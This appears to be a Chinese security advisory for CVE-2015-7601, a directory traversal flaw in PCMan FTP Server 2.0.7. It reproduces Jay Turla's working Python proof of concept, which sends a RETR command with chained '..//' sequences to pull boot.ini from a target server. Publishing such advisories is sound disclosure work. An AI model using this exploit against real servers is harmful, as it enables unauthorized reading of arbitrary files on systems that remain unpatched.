PCMan FTP Server信息泄露漏洞(CVE-2015-7601)
发布日期:2015-09-29
更新日期:2015-09-30
受影响系统:PCMan PCMan FTP Server 2.0.7
描述:
CVE(CAN) ID:
CVE-2015-7601
PCMan FTP Server是简单易于的基础FTP服务器。
PCMan FTP Server 2.0.7版本存在目录遍历漏洞,远程攻击者通过RETR命令内的"../ ",利用此漏洞可读取任意文件。
<*来源:Jay Turla
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Jay Turla ()提供了如下测试方法:
#!/usr/bin/python
# title: PCMan FTP Server v2.0.7 Directory Traversal
# author: Jay Turla <@shipcod3>
# tested on Windows XP Service Pack 3 - English
# software Link:
https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# description: PCMAN FTP 2.07 is vulnerable to Directory Traversal (quick and dirty code just for PoC)
from ftplib import FTP
ftp = FTP(raw_input("Target IP: "))
ftp.login()
ftp.retrbinary('RETR ..//..//..//..//..//..//..//..//..//..//..//boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
建议:
厂商补丁:
PCMan
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/projects/pcmanftpd/浏览次数:1899
严重程度:0(网友投票)